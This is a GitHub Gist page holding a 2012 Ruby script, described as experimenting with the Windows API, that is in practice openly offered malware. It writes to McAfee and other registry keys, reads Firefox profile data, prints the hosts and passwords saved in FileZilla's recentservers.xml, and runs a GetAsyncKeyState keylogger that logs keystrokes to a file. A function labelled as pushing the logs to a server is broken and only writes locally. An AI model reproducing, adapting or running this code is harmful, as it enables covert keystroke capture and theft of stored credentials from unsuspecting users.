Created
November 5, 2012 09:37
-
-
Save b1nary/4016329 to your computer and use it in GitHub Desktop.
messing around with rubys W32 api
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!usr/bin/ruby | |
| require 'Win32API' | |
| require 'open-uri' | |
| require 'win32ole' | |
| require 'win32/registry' | |
| @count = 0 | |
| puts "APPDATA: #{ENV['APPDATA']}" | |
| puts "Open a IE" | |
| ie = WIN32OLE.new('InternetExplorer.Application') | |
| ie.visible = true | |
| ie.gohome | |
| def notify_me(text) | |
| puts ":: Keylogger pushes data to Server" | |
| open("http://www.google.com") {|src| | |
| open("test.html?#{File.open('logs.txt').read}","wb") {|dst| | |
| dst.write(src.read) | |
| } | |
| } | |
| end | |
| def savefile(filename,text) | |
| files = File.open(filename,'a') | |
| files.write text | |
| notify_me(text) if @count % 20 == 0 | |
| @count +=1 | |
| end | |
| def capturar | |
| nave = Win32API.new("user32","GetAsyncKeyState",["i"],"i") | |
| while 1 | |
| for num1 in (0x30..0x39) #numbers | |
| if nave.call(num1) & 0x01 == 1 | |
| savefile("logs.txt",num1.chr()) | |
| end | |
| end | |
| for num2 in (0x41..0x5A) #letters | |
| if nave.call(num2) & 0x01 == 1 | |
| savefile("logs.txt",num2.chr()) | |
| end | |
| end | |
| end | |
| end | |
| print "Read some random Environment values: " | |
| GetDesktopWindow = Win32API.new("user32", "GetDesktopWindow", [], 'L') | |
| GetActiveWindow = Win32API.new("user32", "GetActiveWindow", [], 'L') | |
| puts "DesktopWindow: #{GetDesktopWindow} ActiveWindow: #{GetActiveWindow}" | |
| puts "\nREAD ENV FROM REGISTRY\n" | |
| a = Win32::Registry::HKEY_LOCAL_MACHINE.open "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", Win32::Registry::KEY_READ | |
| a.each{|k, v| p "#{k} - #{v}"} | |
| a.close | |
| puts "\nREAD SOFTWARE INFO FROM REGISTRY\n" | |
| keyname= "SOFTWARE" | |
| access = Win32::Registry::KEY_ALL_ACCESS | |
| Win32::Registry::HKEY_LOCAL_MACHINE.open(keyname, access) do |reg| | |
| reg.each_key{|k, v| puts "#{k} - #{v}"} | |
| end | |
| puts "\nFUCK AROUND IN THE REGISTRY\n" | |
| puts "Write something to: HKEY_CURRENT_USER/Software/Microsoft/MediaPlayer" | |
| Win32::Registry::HKEY_CURRENT_USER.open('Software\Microsoft\MediaPlayer', Win32::Registry::KEY_WRITE) do | reg | | |
| reg.write_s('SomeKeyName', 'my new value') | |
| end | |
| puts "Write something to: HKEY_CURRENT_USER/Software/McAfee/DesktopProtection" | |
| Win32::Registry::HKEY_CURRENT_USER.open('Software\McAfee\DesktopProtection', Win32::Registry::KEY_WRITE) do | reg | | |
| reg.write_s('Haxored', '424242') | |
| end | |
| puts "\n\nREAD DATA FROM FIREFOX\n" | |
| print "Detected profile path: " | |
| @path = Dir.glob("#{ENV['APPDATA']}\\Mozilla\\Firefox\\Profiles\\*".gsub('\\','/')).first | |
| puts @path | |
| puts "Dont read bookmarks, history, whatever now, because we would need the SQLite Library" | |
| print "Read a file from there with some weird key in it: " | |
| puts File.open("#{@path}/urlclassifierkey3.txt").read | |
| puts "\n\nNow lets get some passwords, we know we all use Filezilla so lets go!" | |
| File.open("#{ENV['APPDATA']}\\FileZilla\\recentservers.xml".gsub('\\','/')).read.split('<Server>').each do |c| | |
| next if c.nil? or !c.include? '<Host>' | |
| begin | |
| puts "Host: #{c.split('<Host>')[1].split('</Host>')[0]}" | |
| puts "Pass: #{c.split('<Pass>')[1].split('</Pass>')[0]}\n\n" | |
| rescue | |
| end | |
| end | |
| puts "\n\nStarting keylogger..." | |
| capturar() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment